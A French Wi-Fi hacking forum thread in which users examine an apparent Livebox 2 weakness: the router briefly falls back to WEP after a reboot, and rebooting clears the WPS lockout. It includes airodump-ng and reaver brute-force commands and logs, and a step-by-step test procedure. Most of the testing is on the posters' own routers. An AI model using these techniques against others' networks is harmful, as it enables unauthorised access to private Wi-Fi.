Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 12-06-2013 00:50:35

Hadley's_Hope
Membre
Inscription : 13-07-2011
Messages : 23

Possible faille Livebox2 (

Salut,

Bon je vais être direct, il est tard.

Suite au reboot de ma livebox 2 ( Version logicielle :     FAST3XXX_6814BA ), mon PA wifi c'est désactivé.
Lors de sa réaparition +Xsecondes (x>30), voila ce qui m'est demandé:

http://www.crack-wifi.com/forum/img/mem … -titre.jpg


Or j'ai configuré mon PA wifi en WPA/WPA2 TKIP/AES.

J'ai essayé avec mon mot de passe wifi actuel....ne fonctionne pas.
J'ai essayé avec mon ancien mot de passe wifi en WEP (lorsque je faisais du backtrack sur mon réseau) et bizarement, sa c'est connecté (en tout cas sa ne m'a pas dit "mauvais mdp"). Mais mon adresse ip était une adresse IP APIPA.
Peut-être le timing était pas assé rapide.

Mais en tout cas j'en conclut que:
-Les anciens mot de passe sont toujours en mémoire.
-Que la livebox 2 passe d'abord par le WEP avant de switcher.


Biensur se n'est qu'une constation....que j'ai constaté deux fois de suite (2 redémarrage de la livebox2).

Cordialement,

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 25-11-2013 00:02:50

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : Possible faille Livebox2 (

Salut à toi Hadley's_Hope (et à tous les autres du forum, sur lequel je n'était pas venu depuis plusieurs années tongue Ça fait plaisir de voir que beaucoup d'anciens sont toujours la ! J'avais était très actif à l'époque du boom des rogues AP et avait codé les pages d'interface web de l'époque des boxes de la plupart des FAI cool).

J'ai également fait la même constatation que toi concernant le reboot de la Livebox 2 :
Airodump-ng affiche la box d'abord avec le chiffrement WEP, puis ensuite avec le chiffrement WPA ou WPA2 (en fonction de comment vous l'avez configurée).
Je ne peux cependant pas confirmer ta première constation (concernant la conservation de l'ancien mot de passe après une mise à jour de la box).

Suite à mes tests je peux me permettre d'apporter les constations supplémentaires suivantes :

1) La box apparait d'abord en WEP mais pendant 5 à 10 secondes seulement (sniff sad). Le chiffrement switch ensuite en WPA2/CCMP/PSK (avec ma config).

2) J'ai réussi à obtenir 10 000 IVs pour aircrack-ng en 24heures d'écoute de la manière suivante :
            a) Lancer airodump-ng comme ceci :
               

airodump-ng --channel ? --bssid XX:XX:XX:XX:XX:XX -w outputFile mon0

                (Je ne me souviens plus du channel)
            b) Reboot de la box toute les une ou deux minutes.
Cependant le crack de la clef en mode WEP via aircrack-ng n'est toujours pas réalisable (encore sniff sad). Donc soit je n'ai pas assez d'IVs (je continuerai les tests bientôt pour éliminer cette possibilité), soit les packets à priori WEP sont en fait invalides (ça je ne sais pas comment le vérifier...).
Aussi, peut-être que j'aurais du lancer airodump-ng avec l'option permettant la capture des IV pour le crack uniquement ?

3) Si l'option WPS était en état "verrouillé" (dû à trop d'essais de PIN invalides) avant que la box ne redémarre, alors une fois le reboot terminé elle devient nouveau utilisable.

4) Le PIN WPS est régénéré aléatoirement après chaque reboot de la box.



Je ne suis cependant pas certains de ma constatation 4 car je n'ai pu observer se phénomène qu'une seule fois de la façon suivante :
            a) J'ai connecté (authentifié) un premier PC sur la Livebox 2.
            b) Ensuite sur un deuxième ordinateur j'ai lancé reaver comme ceci :
               

reaver -i mon0 -c ? -f -b XX:XX:XX:XX:XX:XX -m YY:YY:YY:YY:YY:YY -vv

                Avec 'X'=MAC du PA et 'Y'=MAC du premier PC.
            c) Enfin je faisait un reboot de la box toute les une ou deux minutes afin que le crack WPS puisse continuer une fois l'AP bloquée (au bout de 18 PIN testés dans mon cas).
            d) Arrivé à la première moitié de PIN "1035", reaver se met à afficher des M5 et des M6 (indicateurs de la validité de la première moitié du PIN). Le crack passe alors à 90% et des bananes comme prévu.
            e) Reaver commence à tester la seconde moitié du PIN puis l'option WPS se bloque comme prévu après 18 PIN testés. Dans le temps j'ai donc eu quelque chose comme ça:

        ...
        PIN 0145000? { M1 -> M4 }
        PIN 0146000? { M1 -> M4 }
        ...
        PIN 1029000? { M1 -> M4 }
        PIN 1030000? { M1 -> M4 }
          => Reboot Livebox 2 <=
        PIN 1031000? { M1 -> M4 }
        PIN 1032000? { M1 -> M4 }
        PIN 1033000? { M1 -> M4 }
        PIN 1034000? { M1 -> M4 }
        PIN 1035000? { M1 -> M6 }
        PIN 1035001? { M1 -> M6 }
        PIN 1035002? { M1 -> M6 }
        PIN 1035003? { M1 -> M6 }
        PIN 1035004? { M1 -> M6 }
        PIN 1035005? { M1 -> M6 }
        PIN 1035006? { M1 -> M6 }
        PIN 1035007? { M1 -> M6 }
        PIN 1035008? { M1 -> M6 }
        PIN 1035009? { M1 -> M6 }
        PIN 1035010? { M1 -> M6 }
        PIN 1035011? { M1 -> M6 }
        PIN 1035012? { M1 -> M6 }
        PIN 1035013? { M1 -> M6 }
          => Reboot Livebox 2 <=
        PIN 1035014? { M1 -> M4 }
        PIN 1035015? { M1 -> M4 }
        PIN 1035016? { M1 -> M4 }
        ...

Le problème de la constatation 4 c'est que je n'ai pas noté le WPS de la box avant de lancer l'attaque reaver. Du coup impossible de confirmer si le PIN commençait bien par 1035 avant l'attaque, et je n'ai pas la box sous la main pour pouvoir faire le test...
=> Quelqu'un peut il activer l'option WPS, définir un PIN valide précis, redémarrer la box (la débrancher) et voir si le PIN à été régénéré ? Need testers smile ! Il est possible que le PIN se régénère après un certains nombre de reboot de la box (ou en fonction d'autres conditions dont je n'ai aucune idée).


Voila voila, j'attends vos réponses. Content d'être de retour parmis vous wink !


PS: Je suis en train de vous concocter deux articles parlant de mes deux derniers scripts (génération de dico et crack WPA/WPA2 smile).
EDIT: Correction des fautes de frappe/grammaire tongue

Dernière modification par Djembadi (25-11-2013 15:00:33)

Hors Ligne

#3 25-11-2013 01:55:19

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Possible faille Livebox2 (

Welcome back l'ami smile

Hors Ligne

#4 25-11-2013 15:35:57

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : Possible faille Livebox2 (

Personne n'a de Livebox 2 sous la main ?!

@M1ck3y: Merci smile

Dernière modification par Djembadi (28-11-2013 05:47:48)

Hors Ligne

#5 25-11-2013 17:28:22

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Possible faille Livebox2 (

Vérifie que tu n'aies pas un "fake M6"
exemple de fake M6 sur routeur qui n'a pas comme début de PIN 1234 mais 8437, rien à voir et tu vas voir comme sournoisement un M6 se colle dans le processus .
Logiquement reaver devrait relancer la première moitié parce que il y a un timeout en fin de procédé mais pour une raison qui m'échappe, l'erreur type 02 puis 03 qui s"activent normalement dans ces cas, quelques fois ne s'activent pas. tongue
voici un log



[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01235678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
Received M5 message
Sending M6 message

[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 01230000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01230000
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

l'erreur s'active mais trop tard , le mal est fait et la session est corrompu, reaver va à continuer à lancer comme première moitié 1234,et l'attaque échouera


Mais tout semble indiquer qu'il s'agit d'un changent de PIN au reset, et je me demande même si ce n'est pas encore pus machiavélique que ça.  laugh.gif

C'est à dire que le PIN se change seulement lorsque il y a eu un M6....
C'est à dire le hacker passe 5 mois a obtenir le M6 et badadboum.... il faut tout recommencer   big_smile

PS: Welcome back! smile

Hors Ligne

#6 25-11-2013 17:46:28

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : Possible faille Livebox2 (

Ok donc l'erreur M6 de reaver pourrait expliquer l'échec de mon attaque.

Il nous faut donc toujours une personne pour tester. Voici la procédure si quelqun a une Livebox 2:

  1. 1) Noter le PIN actuel de l'option WPS de votre Livebox 2 (via l'interface de configuration de la box).

  2. 2) Lancer reaver directement sur le crack de la seconde moitié du PIN comme ceci :

    reaver -i INTERFACE -c CHANNEL -f -b XX:XX:XX:XX:XX:XX -p ???? -vv
    • INTERFACE = Nom de votre interface wifi en mode monitor (cf. airmon-ng).

    • CHANNEL = Le channel de votre box.

    • XX:XX:XX:XX:XX:XX = L'addresse mac de votre box.

    • ???? = Les 4 premiers chiffres du PIN que vous avez noté à l'étape 1.

        Normalement reaver devrait afficher des M6 vu que votre première moitié de PIN est valide.
        Vous aurez donc quelque chose comme ça :

    Trying PIN 1234000?
    { received/sending: M1 -> M6 }
    Trying PIN 1234001?
    { received/sending: M1 -> M6 }
    Trying PIN 1234002?
    { received/sending: M1 -> M6 }
    ...
    ...
    { WPS LOCKED }

        Votre box devrait alors passer en mode "WPS locked" après un certains nombre d'essais.

  3. 3) Redémarrez votre box (la débrancher).

  4. 4) Aller voir si le PIN est toujours le même (via l'interface de configuration de la box).

  5. OPTIONNEL: 5) Reprendre le crack reaver là ou il en était et voir si vous recevez toujours les M6.



[EDIT] @kcdtv: Merci wink

Dernière modification par Djembadi (25-11-2013 19:46:35)

Hors Ligne

#7 28-11-2013 12:28:59

guifort
Membre Indéboulonnable
Inscription : 13-08-2008
Messages : 135

Re : Possible faille Livebox2 (

Hello,

ça fait également un moment que je suis pas passer ici par hasard je vois ça ... ! j'avais justement remarqué un comportement bizarre sur la Play.

C'est avec quel firmware ça ? OpenRG ou [email protected] ?

Hors Ligne

#8 28-11-2013 21:00:11

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Possible faille Livebox2 (

C'est le sujet des come back! big_smile Comment vas tu l'ami? Bon retour parmi nous!

Hors Ligne

#9 29-11-2013 19:05:18

guifort
Membre Indéboulonnable
Inscription : 13-08-2008
Messages : 135

Re : Possible faille Livebox2 (

Effectivement ! Pour le firmware tu peux voir ça dans la box la version du firmware tout est indiqué !

Hors Ligne

#10 28-01-2014 21:30:59

Benuyst
N00b
Inscription : 28-01-2014
Messages : 4

Re : Possible faille Livebox2 (

J'ai une livebox 2 Sagem si ça peux vous aider je veux bien faire le test.
           
1.2     Version logicielle :     FAST3XXX_681420

Dernière modification par Benuyst (28-01-2014 21:34:38)

Hors Ligne

#11 29-01-2014 16:59:34

Djembadi
Membre Hyperactif
Inscription : 15-11-2008
Messages : 51

Re : Possible faille Livebox2 (

La procédure du test est précisé ci-dessus.

Hors Ligne

#12 29-01-2014 19:04:19

Benuyst
N00b
Inscription : 28-01-2014
Messages : 4

Re : Possible faille Livebox2 (

J'ai paramétré moi meme le PIN 09351370 pour connecter un PC sous windows 8 en wifi sur la livebox 2 sur sa page d'administration et lancer reaver sur un 2eme PC sous Kali-linux. Reaver bloque au bout de 19 PIN sur Sending/Received identity resquet. Je redémarre donc la box. Relance reaver. Après 3 redémarrage de la livebox et vérification a chaque fois sur la page d'administration, le PIN WPS reste inchangé. sur reaver je suis à 0.66% lol j'attends encore le M6 .......

Dernière modification par Benuyst (29-01-2014 19:32:30)

Hors Ligne

#13 30-01-2014 20:32:38

Benuyst
N00b
Inscription : 28-01-2014
Messages : 4

Re : Possible faille Livebox2 (

Je reviens vers vous pour m'eclairer sur un doute après mainte essaye. J'arrive jamais a obtenir le fameux M5-M6 meme lorsque le début du PIN testé par reaver correspond bien a celui que j'ai paramétré dans la box a savoir le 03663165

reaver -i wlan1 -c 6 -f -vv -b 00:19:70:34:76:24 -m 00:14:D1:63:D5:85
 3.41% complete @ 2014-01-30 16:26:27 (8 seconds/pin)
[+] Max time remaining at this rate: 23:36:40 (10625 pins left to try)
[+] Trying pin 03655672
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 03665671
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 03675670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 03685679
.........................

logiquement le M5-M6 devrais apparaitre apres le [+] Trying pin 03665671 non ? faut-il le laisser continuer malgré tout ?
et je précise que j'ai le meme probleme avec le paramètre -p dans reaver

reaver -i wlan1 -c 6 -f -vv -b 00:19:70:34:76:24 -m 00:14:D1:63:D5:85 -p 0366

reaver continue son test comme si de rien n'était !!

Trying pin 03663158
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 93.85% complete @ 2014-01-30 20:00:21 (7 seconds/pin)
[+] Max time remaining at this rate: 1:18:52 (676 pins left to try)
[+] Trying pin 03663165
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 03663172
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
.................

alors que mon PIN apparait bien en entier [+] Trying pin 03663165 et au regarde de la remarque 4 le PIN code dans la page de configuration de la Livebox 2 n'a jamais changé au cours du test !

PS: j'avais pas précisé ma carte wifi est une ALFA AWUS036NHR cheapset RTL8192cu en mode monitor

ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up

esce qu'il vaut mettre en monitor grace a cette commande ?

airmon-ng start wlan1

Dernière modification par Benuyst (30-01-2014 20:52:52)

Hors Ligne

#14 30-01-2014 20:49:05

Benuyst
N00b
Inscription : 28-01-2014
Messages : 4

Re : Possible faille Livebox2 (

si quelq'un peux supprimer ce post inutile merci smile

Dernière modification par Benuyst (30-01-2014 20:54:34)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
0 161 29-10-2016 11:12:05 par sukawa2007
11 445 05-09-2016 15:07:25 par MiscL
81 15764 29-06-2016 10:27:55 par Fab955
21 8232 15-01-2016 13:53:04 par kcdtv
14 12301 05-10-2015 13:44:46 par BobX64

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.051 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]